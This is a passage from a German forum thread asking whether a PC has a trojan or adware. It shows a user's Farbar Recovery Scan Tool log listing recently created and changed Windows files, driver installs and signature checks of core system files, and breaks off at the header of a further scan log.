2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS
2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys
2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP
2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP
2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-21 21:01 - 2017-03-20 06:41 - 00877602 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-21 21:01 - 2017-03-20 06:41 - 00184122 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-21 20:56 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-05-21 20:56 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive
2017-05-21 20:55 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-05-21 20:55 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-21 20:55 - 2017-02-05 21:38 - 00014132 _____ C:\bdlog.txt
2017-05-21 20:55 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-21 20:54 - 2017-02-05 21:41 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-05-21 20:54 - 2017-02-05 21:40 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-05-21 18:01 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla
2017-05-21 12:27 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-05-20 14:33 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew
2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini
2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-17 21:22 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD
2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-05-09 21:42 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-05-09 21:40 - 2015-05-01 17:30 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages
2017-05-09 21:23 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-08 22:37 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017
2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia
2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016
2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung
2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II
2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo
2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician
2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod
2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys
2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc
2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8
2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1
2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive
2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek
2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared
2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD
2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam
2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb
2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2017-04-22 19:40 - 2015-04-26 13:54 - 00000000 ____D C:\Users\Dino\AppData\Local\JDownloader v2.0

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg
2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
2017-05-19 14:16 - 2017-05-19 14:16 - 7178424 _____ (VS Revo Group                                               ) C:\Users\Dino\AppData\Local\Temp\VSUSetup.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-19 15:19

==================== Ende von FRST.txt
         

Alt 21.05.2017, 21:14   #5
dinoexe
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-05-2017
durchgeführt von Dino (21-05-2017 21:05:18)
